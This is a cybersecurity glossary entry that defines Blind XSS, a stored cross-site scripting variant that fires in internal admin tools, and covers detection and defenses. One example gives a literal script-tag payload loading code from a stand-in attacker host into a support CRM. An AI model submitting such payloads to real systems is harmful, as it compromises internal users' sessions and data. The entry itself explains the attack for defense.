Skip to content
Vol. 1 · Ed. 2026
CyberGlossary
Entry № 104

Blind XSS

What is Blind XSS?

Blind XSSA stored XSS variant where the payload fires in a context the attacker cannot directly see, typically an internal admin panel or back-office tool.


Blind XSS is a subclass of stored XSS in which the malicious script does not execute in the attacker's own browser, but in a different, usually privileged, context — a customer-support ticket view, a fraud-review console, an internal dashboard, or a backup report. The attacker submits a payload through a public form (contact, registration, support request) and waits for an internal user to render the saved data. Detection relies on out-of-band callbacks: the payload exfiltrates data to a tracker such as XSS Hunter, Burp Collaborator, or a custom DNS/HTTP server, revealing where the script ran. Defenses are identical to stored XSS plus strong CSP on admin tools.

Examples

  1. 01

    A support form field containing <script src=https://x.attacker/x.js></script> that fires in the agent's CRM.

  2. 02

    A user-agent header logged into an admin log viewer that does not encode HTML.

Frequently asked questions

What is Blind XSS?

A stored XSS variant where the payload fires in a context the attacker cannot directly see, typically an internal admin panel or back-office tool. It belongs to the Attacks & Threats category of cybersecurity.

What does Blind XSS mean?

A stored XSS variant where the payload fires in a context the attacker cannot directly see, typically an internal admin panel or back-office tool.

How does Blind XSS work?

Blind XSS is a subclass of stored XSS in which the malicious script does not execute in the attacker's own browser, but in a different, usually privileged, context — a customer-support ticket view, a fraud-review console, an internal dashboard, or a backup report. The attacker submits a payload through a public form (contact, registration, support request) and waits for an internal user to render the saved data. Detection relies on out-of-band callbacks: the payload exfiltrates data to a tracker such as XSS Hunter, Burp Collaborator, or a custom DNS/HTTP server, revealing where the script ran. Defenses are identical to stored XSS plus strong CSP on admin tools.

How do you defend against Blind XSS?

Defences for Blind XSS typically combine technical controls and operational practices, as detailed in the full definition above.

What are other names for Blind XSS?

Common alternative names include: Out-of-band XSS.

Related terms